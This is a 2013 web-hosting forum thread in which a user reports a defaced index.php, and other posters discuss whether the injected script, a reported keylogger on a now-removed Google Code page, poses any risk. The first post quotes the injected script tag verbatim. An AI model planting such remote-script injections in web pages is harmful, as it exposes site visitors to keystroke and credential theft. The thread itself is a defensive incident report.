habafflof Posted November 11, 2013 Share Posted November 11, 2013 Good day. So recently I've been going through the files on my website and noticed that the "index.php" file hosted on my website seemed to be hacked. The contents of it start with:"<html><head><script src='http://adithya.googlecode.com/files/Apctrl%2Bu.js' type='text/javascript'></script><title>Hacked By @Lulz53c</title>" I haven't noticed it for a while because I have "index.html" there too, so it was accessed before "index.php" and therefore the hack made no impact on the website. The file was last modified on 9/21/13 according to the FTP records and while I'm not really concerned over my website I though that it might've affected other users of Helio Host. I'll attach the actual "index.php" for your reference.index.php Quote Link to comment Share on other sites More sharing options...
lancersupraskyline Posted November 11, 2013 Share Posted November 11, 2013 Well, from some light Googling, it appears that your site is not the first.The JS file was hosted at Google Code, which was already banned/removed, as of October 12.A user reported it to be a keylogger, and Mr. hacker here has a personal blog. Quote Link to comment Share on other sites More sharing options...
habafflof Posted November 11, 2013 Author Share Posted November 11, 2013 The specific javascript wasn't hosted on my website because "index.html" took over "index.php" but should I still be concerned or is it only active while the "index.php" file is accessed? Quote Link to comment Share on other sites More sharing options...
lancersupraskyline Posted November 11, 2013 Share Posted November 11, 2013 In my opinion, it is not a concern, because:Your index.html precedes index.php, so it only runs when user types in <url>/index.php specifically.The JavaScript file has been removed from Google Code, which means the JavaScript won't load. I have tried accessing the JS file directly, and I got a 403 error. If you are still afraid, here's a link to how it looks like with a online screenshot.The whole index.php file do not seem to have any dangerous elements, except for the JS file. Only some psychedelic NyanCats with a YouTube background music.There's a link at the bottom, which leads to a list of hacked websites (I think?), which shows the websites hacked by "Lulz53c", in which Mr. hacker here claims to be a member.Of course, to be safe, clean up your index.php, or remove it totally if you don't need it. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.